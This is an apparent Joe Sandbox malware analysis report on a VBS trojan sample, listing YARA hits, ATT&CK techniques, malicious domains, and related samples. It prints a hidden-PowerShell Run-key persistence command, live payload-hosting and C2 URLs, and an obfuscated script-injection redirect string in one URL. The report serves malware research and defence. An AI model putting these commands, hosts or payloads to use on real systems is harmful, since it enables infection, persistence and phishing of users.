Source: Yara match	File source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.powershell.exe.2078fd84ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2442574542.0000020959177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2263158349.0000020A2AA0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2358188672.000002078FFB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2442574542.0000020958E27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2386362117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	321 Scripting	Valid Accounts	1 Native API	321 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	11 Input Capture	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	212 Process Injection	2 Obfuscated Files or Information	LSASS Memory	12 System Information Discovery	Remote Desktop Protocol	11 Input Capture	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	2 Software Packing	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	113 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Oficio notificacion multas y sanciones.vbs	3%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://oneget.org	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/raw	0%	Avira URL Cloud	safe
https://pastecodeapp.vXB	0%	Avira URL Cloud	safe
https://pastecodeapp.vercel.app	0%	Avira URL Cloud	safe
http://desckvbrat.com.br	0%	Avira URL Cloud	safe
https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/rawP	0%	Avira URL Cloud	safe
http://ftp.desckvbrat.com.br	100%	Avira URL Cloud	malware
http://crl.microsoft	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/raw	0%	Avira URL Cloud	safe
https://aka.ms/pscore6	0%	Avira URL Cloud	safe
https://pastebin.com/raw/pQQ0n3eA	100%	Avira URL Cloud	malware
https://firebasestorage.googleh	0%	Avira URL Cloud	safe
https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/rawP	0%	Avira URL Cloud	safe
https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/rawP	0%	Avira URL Cloud	safe
https://pastecodeapp.vX	0%	Avira URL Cloud	safe
https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/raw	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://pastecodeapp.vercel.app	0%	Avira URL Cloud	safe
https://pastebin.com	0%	Avira URL Cloud	safe
http://pastebin.com	0%	Avira URL Cloud	safe
http://crl.mdHy	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pastecodeapp.vercel.app	76.76.21.22	true	false	unknown
desckvbrat.com.br	191.252.83.213	true	true	unknown
pastebin.com	104.20.4.235	true	true	unknown
notificadoresrma.duckdns.org	46.246.14.5	true	true	unknown
ftp.desckvbrat.com.br	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/raw	false	Avira URL Cloud: safe	unknown
https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/raw	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/pQQ0n3eA	false	Avira URL Cloud: malware	unknown
https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/raw	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.2236815480.000001D3947B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2856145468.000001D3A2CD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2724257529.00000256AFA70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2661344132.000001F552490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65B7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F573ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000008.00000002.2178810552.0000020F56FCF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastecodeapp.vercel.app	powershell.exe, 00000004.00000002.2236815480.000001D392E83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39323F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39438F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastecodeapp.vXB	powershell.exe, 00000004.00000002.2236815480.000001D39438F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/rawP	powershell.exe, 00000004.00000002.2236815480.000001D3946E3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.2178810552.0000020F55D32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000005.00000002.2200486936.000002569FC22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542643000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsoft	powershell.exe, 00000002.00000002.3002434212.000001E2ED8B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2444391639.0000020A42535000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2262307910.0000020A28534000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2353901429.000002078DA85000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2420905012.0000020956705000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.2178810552.0000020F55D32000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ftp.desckvbrat.com.br	powershell.exe, 00000004.00000002.2236815480.000001D394365000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://go.micro	powershell.exe, 00000004.00000002.2236815480.000001D393C6B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://desckvbrat.com.br	powershell.exe, 00000004.00000002.2236815480.000001D394365000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 00000005.00000002.2838267967.00000256B7D72000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2444391639.0000020A42535000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6	powershell.exe, 00000002.00000002.2935786151.000001E2D5798000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.2178810552.0000020F55D32000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/rawP	powershell.exe, 00000004.00000002.2236815480.000001D39323F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastecodeapp.vX	powershell.exe, 00000004.00000002.2236815480.000001D3946E3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/rawP	powershell.exe, 00000004.00000002.2236815480.000001D39438F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.2200486936.000002569FC22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542643000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.2856145468.000001D3A2CD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2724257529.00000256AFA70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2661344132.000001F552490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65B7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F573ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://oneget.orgX	powershell.exe, 00000008.00000002.2178810552.0000020F56FCF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.2935786151.000001E2D57AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D392C78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2200486936.000002569FA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F55B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A15D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A14F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078F6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078F6E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.00000209588AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.00000209588BE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pastecodeapp.vercel.app	powershell.exe, 00000004.00000002.2236815480.000001D3943BA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://firebasestorage.googleh	powershell.exe, 00000004.00000002.2236815480.000001D39475B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2935786151.000001E2D57DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D392C78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2200486936.000002569FA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F55B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A15D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078F73A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.00000209588A6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pastebin.com	powershell.exe, 0000000C.00000002.2263158349.0000020A2A9C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078FF6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.0000020959130000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastebin.com	powershell.exe, 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A9C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.000002095912A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.0000020958FB2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.mdHy	powershell.exe, 00000005.00000002.2847112726.00000256B7F77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oneget.org	powershell.exe, 00000008.00000002.2178810552.0000020F56FCF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
46.246.14.5	notificadoresrma.duckdns.org	Sweden	42708	PORTLANEwwwportlanecomSE	true
104.20.4.235	pastebin.com	United States	13335	CLOUDFLARENETUS	true
191.252.83.213	desckvbrat.com.br	Brazil	27715	LocawebServicosdeInternetSABR	true
76.76.21.22	pastecodeapp.vercel.app	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1517277
Start date and time:	2024-09-24 23:41:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Oficio notificacion multas y sanciones.vbs
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winVBS@38/30@4/4
EGA Information:	Successful, ratio: 30%
HCA Information:	Successful, ratio: 98% Number of executed functions: 101 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 142.250.185.138, 172.217.16.202, 142.250.185.170, 142.250.186.106, 142.250.185.106, 142.250.184.202, 142.250.185.234, 216.58.206.74, 142.250.185.74, 142.250.186.170, 142.250.184.234, 142.250.185.202, 142.250.181.234, 142.250.186.138, 142.250.186.74, 172.217.16.138
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, firebasestorage.googleapis.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegAsm.exe, PID 7544 because it is empty
Execution Graph export aborted for target RegAsm.exe, PID 7788 because it is empty
Execution Graph export aborted for target powershell.exe, PID 1088 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2748 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5436 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6388 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6524 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Oficio notificacion multas y sanciones.vbs

Simulations

Behavior and APIs

Time	Type	Description
17:42:02	API Interceptor	107x Sleep call for process: powershell.exe modified
17:42:55	API Interceptor	15125x Sleep call for process: RegAsm.exe modified
23:42:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nyj cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
23:42:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nyj cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
46.246.14.5	xzcQo6GenFVf.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	xNZytGJGGReK.exe	Get hash	malicious	Remcos	Browse
	9589-PDF.vbs	Get hash	malicious	Njrat, PasteDownloader	Browse
104.20.4.235	envifa.vbs	Get hash	malicious	Remcos	Browse	pastebin.com/raw/V9y5Q5vv
	New Voicemail Invoice 64746w .js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Invoice Payment N8977823.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Pending_Invoice_Bank_Details_XLSX.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Pending_Invoice_Bank_Details_kofce_.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Update on Payment.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
191.252.83.213	Bb65bKypZP.vbs	Get hash	malicious	Unknown	Browse
	u30wlJmZuT.vbs	Get hash	malicious	Unknown	Browse
	bF9JDHS47l.vbs	Get hash	malicious	Remcos	Browse
	TPFK2rYosu.vbs	Get hash	malicious	Unknown	Browse
	TDjIl6ldeJ.vbs	Get hash	malicious	Unknown	Browse
	0Zdq4t4SKO.vbs	Get hash	malicious	Unknown	Browse
	tMkxadpE7f.vbs	Get hash	malicious	Remcos	Browse
	tQthxQV78N.exe	Get hash	malicious	Clipboard Hijacker, Quasar	Browse
	osmAcHNA4D.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse
	ELcnK80Ehf.exe	Get hash	malicious	Clipboard Hijacker, Quasar	Browse
76.76.21.22	http://netflix-clone-rho-rose.vercel.app/	Get hash	malicious	Unknown	Browse	netflix-clone-rho-rose.vercel.app/
	http://axxn-5yor.vercel.app/blog1/	Get hash	malicious	Unknown	Browse	axxn-5yor.vercel.app/blog1/
	http://telegram-fordating.vercel.app/	Get hash	malicious	Unknown	Browse	telegram-fordating.vercel.app/
	http://get-verified--badge.vercel.app/	Get hash	malicious	Unknown	Browse	get-verified--badge.vercel.app/
	http://facebook-clone-peach-delta.vercel.app/76.76.21.241	Get hash	malicious	Unknown	Browse	facebook-clone-peach-delta.vercel.app/76.76.21.241
	http://airbnb-clone-5rqdfy035-aschrock11.vercel.app/	Get hash	malicious	Unknown	Browse	airbnb-clone-5rqdfy035-aschrock11.vercel.app/
	http://netflix-clone-arbaz-31kqcgfnp-arbaz49.vercel.app/	Get hash	malicious	Unknown	Browse	netflix-clone-arbaz-31kqcgfnp-arbaz49.vercel.app/
	http://mysterymint-s10.vercel.app/	Get hash	malicious	Unknown	Browse	mysterymint-s10.vercel.app/
	http://mysterymint-s10.vercel.app/	Get hash	malicious	Unknown	Browse	mysterymint-s10.vercel.app/
	http://mint-opensea-nft33.vercel.app/	Get hash	malicious	Unknown	Browse	mint-opensea-nft33.vercel.app/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pastebin.com	sostener.vbs	Get hash	malicious	Njrat	Browse	104.20.3.235
	bF9JDHS47l.vbs	Get hash	malicious	Remcos	Browse	172.67.19.24
	tMkxadpE7f.vbs	Get hash	malicious	Remcos	Browse	172.67.19.24
	tQthxQV78N.exe	Get hash	malicious	Clipboard Hijacker, Quasar	Browse	104.20.4.235
	osmAcHNA4D.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	104.20.3.235
	ELcnK80Ehf.exe	Get hash	malicious	Clipboard Hijacker, Quasar	Browse	104.20.3.235
	0n25lfPJxD.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	104.20.3.235
	aL8prAD2gL.js	Get hash	malicious	XWorm	Browse	172.67.19.24
	Nuovo Ordine.vbs	Get hash	malicious	Unknown	Browse	172.67.19.24
	S0FTWARE.exe	Get hash	malicious	Go Injector, Vidar, Xmrig	Browse	172.67.19.24

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LocawebServicosdeInternetSABR	Bb65bKypZP.vbs	Get hash	malicious	Unknown	Browse	191.252.83.213
	u30wlJmZuT.vbs	Get hash	malicious	Unknown	Browse	191.252.83.213
	bF9JDHS47l.vbs	Get hash	malicious	Remcos	Browse	191.252.83.213
	TPFK2rYosu.vbs	Get hash	malicious	Unknown	Browse	191.252.83.213
	TDjIl6ldeJ.vbs	Get hash	malicious	Unknown	Browse	191.252.83.213
	0Zdq4t4SKO.vbs	Get hash	malicious	Unknown	Browse	191.252.83.213
	tMkxadpE7f.vbs	Get hash	malicious	Remcos	Browse	191.252.83.213
	tQthxQV78N.exe	Get hash	malicious	Clipboard Hijacker, Quasar	Browse	191.252.83.213
	osmAcHNA4D.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	191.252.83.213
	ELcnK80Ehf.exe	Get hash	malicious	Clipboard Hijacker, Quasar	Browse	191.252.83.213
AMAZON-02US	http://www.hostmaster.amera.co.uk/images.php?p=177058987739%22%3E%3Cimg%20src%3D%22image.jpg%22%20onerror%3D%22var%20url1%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%20var%20url2%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%0D%0Avar%20url%20%3D%20%5B%27ht%27%2C%27tps%27%2C%27%3A%2F%2Fva%27%2C%27ult%27%2C%27dor%27%2C%27es.co%27%2C%27m%2F0%2F0%27%2C%27%2F0%2Fd%27%2C%2715a%27%2C%27d8%27%2C%27213%27%2C%277d5%27%2C%277d0%27%2C%278b%27%2C%27747%27%2C%27555%27%2C%27ec3%27%2C%277%27%2C%27539%27%2C%27e6/13/387-16277/1278-492099-29626%27%5D.join%28%27%27%29%3B%0D%0A%20url%20%3D%20url.replace%28%2F%2C%2Fg%2C%20%27%27%29%3B%20var%20win%20%3D%20window.open%28url%2C%20%27_self%27%29%3B%20win.opener%20%3D%20null%3B%20win.location.replace%28url%29%3B%22%3E#g92s2SFa9QJuB2UtlN4C	Get hash	malicious	Phisher	Browse	3.253.250.90
	http://icmtg.com	Get hash	malicious	Unknown	Browse	176.34.133.63
	http://getcloudapp.com	Get hash	malicious	Unknown	Browse	18.245.46.12
	Audio playback00_05-30-00000.html	Get hash	malicious	HTMLPhisher	Browse	54.217.9.133
	https://ca.docusign.net/Signing/EmailStart.aspx?a=9cc8ef59-5f05-4591-9bc5-780c38f1f38e&etti=24&acct=92cb33b7-3a5a-457e-8432-7aac96872a1d&er=6f6f9a2a-4785-4b45-841b-3f3b157db196	Get hash	malicious	Unknown	Browse	35.160.173.122
	http://trello.com/c/VmtGBtm4	Get hash	malicious	HTMLPhisher	Browse	65.9.66.7
	https://24yah200mai108e89dios181rsd71c0ios99.netlify.app/	Get hash	malicious	Unknown	Browse	143.204.98.2
	https://soygmail.pythonanywhere.com/login/	Get hash	malicious	Unknown	Browse	54.231.197.24
	http://walletsupportdesk.com/	Get hash	malicious	Unknown	Browse	108.138.26.43
	https://violation-policy-meta-ticket-id6398903.vercel.app/	Get hash	malicious	Unknown	Browse	76.76.21.98
PORTLANEwwwportlanecomSE	9B10a4bkpu.elf	Get hash	malicious	Mirai	Browse	5.254.217.53
	SX8OLQP63C.exe	Get hash	malicious	VjW0rm, AsyncRAT, RATDispenser	Browse	46.246.80.17
	http://lakerie.com	Get hash	malicious	Unknown	Browse	5.249.165.116
	SecuriteInfo.com.Win32.Trojan-Downloader.Generic.XVN7C1.21480.14818.exe	Get hash	malicious	Unknown	Browse	185.117.88.39
	SecuriteInfo.com.Win32.Trojan-Downloader.Generic.XVN7C1.21480.14818.exe	Get hash	malicious	Unknown	Browse	185.117.88.39
	MACHINE_SPECIFICATION.js	Get hash	malicious	WSHRat	Browse	46.246.84.83
	HDKuOe.exe	Get hash	malicious	Unknown	Browse	185.117.88.39
	HDKuOe.exe	Get hash	malicious	Unknown	Browse	185.117.88.39
